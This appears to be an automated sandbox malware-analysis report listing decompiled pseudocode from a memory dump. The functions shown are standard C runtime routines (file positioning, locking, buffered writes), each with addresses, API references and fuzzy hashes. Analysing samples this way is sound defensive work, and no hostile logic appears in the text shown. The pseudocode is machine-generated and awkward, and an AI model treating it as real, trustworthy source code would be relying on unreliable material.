				_push(0x421490);
				E0040E198(__ebx, __edi, __esi);
				_t31 = E004106F5(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6A0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2151600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B675(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2151600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2151600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414027();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E75A(_t29, _t31, 0x20);
				}
				return E0040E1DD(_t33);
			}










                                                                                                            0x00413f8c
                                                                                                            0x00413f8c
                                                                                                            0x00413f8c
                                                                                                            0x00413f8c
                                                                                                            0x00413f8e
                                                                                                            0x00413f93
                                                                                                            0x00413f9d
                                                                                                            0x00413f9f
                                                                                                            0x00413fa7
                                                                                                            0x00413fc8
                                                                                                            0x00413fce
                                                                                                            0x00413fd2
                                                                                                            0x00413fd5
                                                                                                            0x00413fd8
                                                                                                            0x00413fde
                                                                                                            0x00413fe0
                                                                                                            0x00413fe2
                                                                                                            0x00413fe5
                                                                                                            0x00413feb
                                                                                                            0x00413fed
                                                                                                            0x00413fef
                                                                                                            0x00413ff5
                                                                                                            0x00413ff7
                                                                                                            0x00413ff8
                                                                                                            0x00413ffd
                                                                                                            0x00413ff5
                                                                                                            0x00413fed
                                                                                                            0x00413ffe
                                                                                                            0x00414003
                                                                                                            0x00414006
                                                                                                            0x0041400c
                                                                                                            0x00414010
                                                                                                            0x00414010
                                                                                                            0x00414016
                                                                                                            0x0041401d
                                                                                                            0x00413faf
                                                                                                            0x00413faf
                                                                                                            0x00413faf
                                                                                                            0x00413fb4
                                                                                                            0x00413fb8
                                                                                                            0x00413fbd
                                                                                                            0x00413fc5

                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00413F98
                                                                                                              • Part of subcall function 004106F5: __getptd_noexit.LIBCMT ref: 004106F8
                                                                                                              • Part of subcall function 004106F5: __amsg_exit.LIBCMT ref: 00410705
                                                                                                            • __amsg_exit.LIBCMT ref: 00413FB8
                                                                                                            • __lock.LIBCMT ref: 00413FC8
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00413FE5
                                                                                                            • InterlockedIncrement.KERNEL32(02151600), ref: 00414010
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 4271482742-0
                                                                                                            • Opcode ID: f298fabd8f047bc6ad32a8155797bab0689b2642a165e2d8a50ab7812a8779c4
                                                                                                            • Instruction ID: 0a5a4f495f167f6c34194af0f49e0f26208b89b7b54093b195613614d1faecbf
                                                                                                            • Opcode Fuzzy Hash: f298fabd8f047bc6ad32a8155797bab0689b2642a165e2d8a50ab7812a8779c4
                                                                                                            • Instruction Fuzzy Hash: 3401A532E45611E7C720AF26990679EB770AF44B25F44042BF804A72D0C77CA9C2CBCD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004135D0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E004135D0() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                            0x004135d5
                                                                                                            0x004135dd
                                                                                                            0x004135f4
                                                                                                            0x004135a0
                                                                                                            0x004135a9
                                                                                                            0x004135b5
                                                                                                            0x004135b8
                                                                                                            0x004135bb
                                                                                                            0x004135bd
                                                                                                            0x004135c0
                                                                                                            0x004135c5
                                                                                                            0x004135cf
                                                                                                            0x004135c7
                                                                                                            0x004135cb
                                                                                                            0x004135cb
                                                                                                            0x004135df
                                                                                                            0x004135e5
                                                                                                            0x004135ed
                                                                                                            0x00000000
                                                                                                            0x004135ef
                                                                                                            0x004135ef
                                                                                                            0x004135f3
                                                                                                            0x004135f3
                                                                                                            0x004135ed

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,0040CDB5), ref: 004135D5
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004135E5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                            • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                            • Instruction ID: 4ed17461b18e8ad078d68ebb72b884049137bbd641d90a5a2387fd8933cf83de
                                                                                                            • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                            • Instruction Fuzzy Hash: C0F06230600A0AE2DB005FA1ED1E3EFBE79BB84B46F5101A19192B0094DF34D1B5825A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040C708, Relevance: 6.1, APIs: 4, Instructions: 148COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E0040C708(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040F9E0(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E004118F9(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E004118F9(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E004118F9(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BF81(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BF81(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E704(__edx, _t104, __esi);
				goto L2;
			}






























                                                                                                            0x0040c708
                                                                                                            0x0040c708
                                                                                                            0x0040c712
                                                                                                            0x0040c715
                                                                                                            0x0040c717
                                                                                                            0x0040c719
                                                                                                            0x0040c73c
                                                                                                            0x0040c741
                                                                                                            0x0040c745
                                                                                                            0x0040c748
                                                                                                            0x0040c74a
                                                                                                            0x0040c74a
                                                                                                            0x0040c74d
                                                                                                            0x0040c74f
                                                                                                            0x0040c750
                                                                                                            0x0040c751
                                                                                                            0x0040c759
                                                                                                            0x0040c75b
                                                                                                            0x0040c75e
                                                                                                            0x0040c733
                                                                                                            0x00000000
                                                                                                            0x0040c760
                                                                                                            0x0040c760
                                                                                                            0x0040c763
                                                                                                            0x0040c769
                                                                                                            0x0040c773
                                                                                                            0x0040c775
                                                                                                            0x0040c778
                                                                                                            0x0040c77d
                                                                                                            0x0040c780
                                                                                                            0x0040c783
                                                                                                            0x0040c7c6
                                                                                                            0x0040c7c8
                                                                                                            0x0040c7b9
                                                                                                            0x0040c7b9
                                                                                                            0x0040c7bc
                                                                                                            0x0040c7da
                                                                                                            0x0040c7de
                                                                                                            0x0040c898
                                                                                                            0x0040c89e
                                                                                                            0x0040c89e
                                                                                                            0x0040c8a0
                                                                                                            0x00000000
                                                                                                            0x0040c8a0
                                                                                                            0x0040c7e4
                                                                                                            0x0040c7e7
                                                                                                            0x0040c7e9
                                                                                                            0x0040c803
                                                                                                            0x0040c80a
                                                                                                            0x0040c80f
                                                                                                            0x0040c812
                                                                                                            0x0040c817
                                                                                                            0x0040c892
                                                                                                            0x0040c895
                                                                                                            0x0040c895
                                                                                                            0x0040c895
                                                                                                            0x00000000
                                                                                                            0x0040c895
                                                                                                            0x0040c819
                                                                                                            0x0040c81b
                                                                                                            0x0040c81d
                                                                                                            0x0040c828
                                                                                                            0x0040c82b
                                                                                                            0x0040c84d
                                                                                                            0x0040c84f
                                                                                                            0x0040c852
                                                                                                            0x0040c855
                                                                                                            0x0040c85d
                                                                                                            0x0040c85f
                                                                                                            0x0040c866
                                                                                                            0x0040c86b
                                                                                                            0x0040c86e
                                                                                                            0x0040c880
                                                                                                            0x0040c880
                                                                                                            0x0040c883
                                                                                                            0x0040c883
                                                                                                            0x0040c888
                                                                                                            0x0040c88d
                                                                                                            0x0040c88d
                                                                                                            0x0040c88f
                                                                                                            0x0040c88f
                                                                                                            0x0040c88f
                                                                                                            0x0040c88f
                                                                                                            0x00000000
                                                                                                            0x0040c88d
                                                                                                            0x0040c870
                                                                                                            0x0040c873
                                                                                                            0x0040c876
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040c878
                                                                                                            0x0040c87e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040c87e
                                                                                                            0x0040c861
                                                                                                            0x0040c861
                                                                                                            0x00000000
                                                                                                            0x0040c861
                                                                                                            0x0040c82d
                                                                                                            0x0040c833
                                                                                                            0x0040c840
                                                                                                            0x0040c840
                                                                                                            0x0040c842
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040c837
                                                                                                            0x0040c83a
                                                                                                            0x0040c83c
                                                                                                            0x0040c83c
                                                                                                            0x0040c83c
                                                                                                            0x0040c83c
                                                                                                            0x0040c83f
                                                                                                            0x0040c83f
                                                                                                            0x0040c83f
                                                                                                            0x0040c844
                                                                                                            0x00000000
                                                                                                            0x0040c844
                                                                                                            0x0040c7eb
                                                                                                            0x00000000
                                                                                                            0x0040c7eb
                                                                                                            0x0040c7be
                                                                                                            0x00000000
                                                                                                            0x0040c7be
                                                                                                            0x0040c7ca
                                                                                                            0x0040c7cf
                                                                                                            0x00000000
                                                                                                            0x0040c7cf
                                                                                                            0x0040c78e
                                                                                                            0x0040c798
                                                                                                            0x0040c79b
                                                                                                            0x0040c7a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040c7a2
                                                                                                            0x0040c7a4
                                                                                                            0x0040c7a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040c7a8
                                                                                                            0x0040c7aa
                                                                                                            0x0040c7aa
                                                                                                            0x0040c7ad
                                                                                                            0x0040c7af
                                                                                                            0x0040c7b2
                                                                                                            0x0040c7b2
                                                                                                            0x0040c7b2
                                                                                                            0x0040c7b4
                                                                                                            0x0040c7b5
                                                                                                            0x0040c7b5
                                                                                                            0x00000000
                                                                                                            0x0040c7aa
                                                                                                            0x00000000
                                                                                                            0x0040c76b
                                                                                                            0x0040c75e
                                                                                                            0x0040c71b
                                                                                                            0x0040c720
                                                                                                            0x0040c721
                                                                                                            0x0040c722
                                                                                                            0x0040c723
                                                                                                            0x0040c724
                                                                                                            0x0040c725
                                                                                                            0x0040c72b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __fileno.LIBCMT ref: 0040C73C
                                                                                                            • __locking.LIBCMT ref: 0040C751
                                                                                                              • Part of subcall function 0040BF81: __getptd_noexit.LIBCMT ref: 0040BF81
                                                                                                              • Part of subcall function 0040E704: __decode_pointer.LIBCMT ref: 0040E70F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                            • String ID:
                                                                                                            • API String ID: 2395185920-0
                                                                                                            • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                            • Instruction ID: 6f9c9bca8bb9244a2b2e9a32aa02568f2d8a2fcccd067bb8801f01c814d0db85
                                                                                                            • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                            • Instruction Fuzzy Hash: 1F519E72E00206EBDB109F69C9C0B59BBB1AF05355F14C27BE915B72D1D378AA41CB89
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405CB0, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E00405CB0(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054A0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E004059D0(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B80D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C42B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405210(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B80D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040B9F0(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}



















                                                                                                            0x00405cb0
                                                                                                            0x00405cb0
                                                                                                            0x00405cb0
                                                                                                            0x00405cb1
                                                                                                            0x00405cb7
                                                                                                            0x00405e2f
                                                                                                            0x00405e2f
                                                                                                            0x00405e2f
                                                                                                            0x00405e33
                                                                                                            0x00405cbd
                                                                                                            0x00405cbd
                                                                                                            0x00405cc4
                                                                                                            0x00000000
                                                                                                            0x00405cca
                                                                                                            0x00405cca
                                                                                                            0x00405cd0
                                                                                                            0x00000000
                                                                                                            0x00405cdf
                                                                                                            0x00405ce4
                                                                                                            0x00405ce8
                                                                                                            0x00405d5d
                                                                                                            0x00405d60
                                                                                                            0x00405d62
                                                                                                            0x00405d62
                                                                                                            0x00405d62
                                                                                                            0x00405d65
                                                                                                            0x00405d67
                                                                                                            0x00000000
                                                                                                            0x00405d6d
                                                                                                            0x00405d6d
                                                                                                            0x00405d71
                                                                                                            0x00405da8
                                                                                                            0x00405dab
                                                                                                            0x00405dad
                                                                                                            0x00405db4
                                                                                                            0x00405db9
                                                                                                            0x00405dbc
                                                                                                            0x00405dbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405daf
                                                                                                            0x00405daf
                                                                                                            0x00405dc0
                                                                                                            0x00405dc0
                                                                                                            0x00405dc2
                                                                                                            0x00405e23
                                                                                                            0x00405e28
                                                                                                            0x00405dc4
                                                                                                            0x00405dc4
                                                                                                            0x00405dc8
                                                                                                            0x00405dde
                                                                                                            0x00405dde
                                                                                                            0x00405de2
                                                                                                            0x00405de4
                                                                                                            0x00405de7
                                                                                                            0x00405de8
                                                                                                            0x00405dec
                                                                                                            0x00405df3
                                                                                                            0x00405df5
                                                                                                            0x00405df5
                                                                                                            0x00405df3
                                                                                                            0x00405dfc
                                                                                                            0x00405dfe
                                                                                                            0x00000000
                                                                                                            0x00405e00
                                                                                                            0x00405e00
                                                                                                            0x00405e00
                                                                                                            0x00405e05
                                                                                                            0x00405e07
                                                                                                            0x00405e09
                                                                                                            0x00405e09
                                                                                                            0x00405e11
                                                                                                            0x00405e16
                                                                                                            0x00405e19
                                                                                                            0x00405e1b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e1d
                                                                                                            0x00405e1f
                                                                                                            0x00405e21
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e21
                                                                                                            0x00000000
                                                                                                            0x00405e00
                                                                                                            0x00405dca
                                                                                                            0x00405dcf
                                                                                                            0x00405dd4
                                                                                                            0x00405dd7
                                                                                                            0x00405dda
                                                                                                            0x00405ddc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ddc
                                                                                                            0x00405dc8
                                                                                                            0x00405dc2
                                                                                                            0x00405d73
                                                                                                            0x00405d79
                                                                                                            0x00405d7b
                                                                                                            0x00405d7c
                                                                                                            0x00405d7d
                                                                                                            0x00405d84
                                                                                                            0x00405d8b
                                                                                                            0x00405d8d
                                                                                                            0x00405d95
                                                                                                            0x00405d97
                                                                                                            0x00000000
                                                                                                            0x00405d9d
                                                                                                            0x00405d9d
                                                                                                            0x00405da0
                                                                                                            0x00405da7
                                                                                                            0x00405da7
                                                                                                            0x00405d97
                                                                                                            0x00405d71
                                                                                                            0x00405cea
                                                                                                            0x00405cec
                                                                                                            0x00405cee
                                                                                                            0x00405cee
                                                                                                            0x00405cf3
                                                                                                            0x00405e29
                                                                                                            0x00405e2a
                                                                                                            0x00405e2a
                                                                                                            0x00405e2e
                                                                                                            0x00405cf9
                                                                                                            0x00405cfd
                                                                                                            0x00405d27
                                                                                                            0x00405d29
                                                                                                            0x00405d57
                                                                                                            0x00405d5c
                                                                                                            0x00405d2b
                                                                                                            0x00405d30
                                                                                                            0x00405d30
                                                                                                            0x00405d37
                                                                                                            0x00405d39
                                                                                                            0x00405d39
                                                                                                            0x00405d41
                                                                                                            0x00405d46
                                                                                                            0x00405d4b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405d51
                                                                                                            0x00405d55
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405d55
                                                                                                            0x00000000
                                                                                                            0x00405d30
                                                                                                            0x00405cff
                                                                                                            0x00405d04
                                                                                                            0x00405d09
                                                                                                            0x00405d0c
                                                                                                            0x00405d11
                                                                                                            0x00000000
                                                                                                            0x00405d17
                                                                                                            0x00405d1f
                                                                                                            0x00405d24
                                                                                                            0x00000000
                                                                                                            0x00405d24
                                                                                                            0x00405d11
                                                                                                            0x00405cfd
                                                                                                            0x00405cf3
                                                                                                            0x00405ce8
                                                                                                            0x00405cd0
                                                                                                            0x00405cc4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: _fseek_malloc_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 208892515-0
                                                                                                            • Opcode ID: f9bd82c2a5a1ddcca416f2ffd994727ef7d96e8105ca708b7d9f7892647dec1c
                                                                                                            • Instruction ID: fb1dde6b94970b1238faede9759046b2f1ea0db44af508fad206ce6175512b40
                                                                                                            • Opcode Fuzzy Hash: f9bd82c2a5a1ddcca416f2ffd994727ef7d96e8105ca708b7d9f7892647dec1c
                                                                                                            • Instruction Fuzzy Hash: C341A572600F014AD7309A2EE80571772E5DF80324F140A3FE5D6E27D5E738E9858F99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040BA6A, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E0040BA6A(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
